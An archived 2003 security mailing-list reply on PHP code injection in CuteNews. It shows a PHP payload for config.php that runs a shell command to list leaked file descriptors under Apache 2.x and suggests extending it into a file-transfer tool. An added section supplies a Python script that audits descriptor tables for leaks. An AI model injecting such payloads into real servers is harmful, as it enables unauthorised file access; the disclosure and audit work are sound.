Re: PHP code injection in CuteNews

From: Steve Grubb (linux_4everat_private)
Date: Fri Feb 28 2003 - 14:18:05 PST


    
     ('binary' encoding is not supported, stored as-is)
    In-Reply-To: <E18ndJT-000JS2-00at_private>
    
    Hello,
    
    If the CuteNews website is running Apache 2.x, which
    leaks descriptors to all kinds of things
    (http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2),
    
    then you can do this:
    
    config.php = 
    
    <html><head><title>File List</title></head>
    <body> <?php
    $cmd = "/bin/ls -l /proc/$$/fd";
    exec($cmd, $dir_listing, $status);
    foreach($dir_listing as $item) {
            $match = preg_split("/> /", $item);
            if ($match[1]) {
                    if (preg_match("/\//", $match[1])) {
                            echo $match[1]; echo "<br>";
                    }
            }
    }
    ?> </body></html>
    
    It doesn't take a lot more to make this a fully
    clickable file transfer utility that sandboxes or jails
    cannot protect.
    
    -Steve Grubb
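Seen from the defender's side, the same `/proc/<pid>/fd` listing the post relies on is exactly what an audit should be checking on a web server: a worker that inherits descriptors it has no business holding is the precondition for the trick above. The script below is an added example, not code from the post or from CuteNews or Apache; it parses `ls -l` output (the sample lines are constructed, not real server output) or reads a live table with `os.readlink`, and reports every descriptor whose target is outside an allow-list. The allow-list prefixes and the file paths in the sample are assumptions for illustration.

```python
"""Audit a process's file-descriptor table for leaked descriptors.

Added example (not from the original post). Works on parsed `ls -l` output
or, on Linux, directly on /proc/<pid>/fd.
"""
import os
from typing import Iterable, List, Tuple

# Targets a CGI/PHP worker is expected to hold (assumed allow-list; adjust
# to the server's real configuration).
ALLOWED_PREFIXES: Tuple[str, ...] = (
    "/dev/null",
    "/dev/pts/",
    "/var/log/apache2/",
    "socket:",
    "pipe:",
    "anon_inode:",
)

# Constructed sample of `ls -l /proc/<pid>/fd` output (not real data).
SAMPLE_LS_OUTPUT = """total 0
lrwx------ 1 www-data www-data 64 Feb 28 14:18 0 -> /dev/null
lrwx------ 1 www-data www-data 64 Feb 28 14:18 1 -> socket:[12345]
l-wx------ 1 www-data www-data 64 Feb 28 14:18 2 -> /var/log/apache2/error.log
lr-x------ 1 www-data www-data 64 Feb 28 14:18 3 -> /etc/ssl/private/server.key
lrwx------ 1 www-data www-data 64 Feb 28 14:18 4 -> pipe:[12346]
"""


def parse_ls_fd(text: str) -> List[Tuple[int, str]]:
    """Turn `ls -l` fd listing lines into (fd_number, link_target) pairs.

    Lines without ' -> ' (the 'total 0' header, blanks) are skipped; the fd
    number is the last whitespace-separated token before the arrow.
    """
    entries = []
    for line in text.splitlines():
        left, arrow, target = line.partition(" -> ")
        if not arrow:
            continue
        fd = int(left.split()[-1])
        entries.append((fd, target.strip()))
    return entries


def read_proc_fd(pid: str = "self") -> List[Tuple[int, str]]:
    """Read the live descriptor table via /proc (Linux only).

    Returns an empty list where /proc is unavailable so the audit degrades
    gracefully on other platforms.
    """
    base = f"/proc/{pid}/fd"
    if not os.path.isdir(base):
        return []
    entries = []
    for name in os.listdir(base):
        try:
            entries.append((int(name), os.readlink(os.path.join(base, name))))
        except OSError:
            # Descriptor closed between listdir() and readlink(); ignore.
            continue
    return sorted(entries)


def find_leaked(entries: Iterable[Tuple[int, str]],
                allowed: Tuple[str, ...] = ALLOWED_PREFIXES) -> List[Tuple[int, str]]:
    """Return descriptors whose target does not start with an allowed prefix."""
    return [(fd, target) for fd, target in entries
            if not target.startswith(allowed)]


if __name__ == "__main__":
    for fd, target in find_leaked(parse_ls_fd(SAMPLE_LS_OUTPUT)):
        print(f"leaked fd {fd} -> {target}")
```

Run against the live table (`find_leaked(read_proc_fd(pid))` for a worker's PID) from a cron job or a configuration test, and treat any hit as a deployment bug to fix at the parent, by closing or marking descriptors close-on-exec before spawning workers, rather than something the sandbox will contain.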
    



    This archive was generated by hypermail 2b30 : Fri Feb 28 2003 - 14:45:03 PST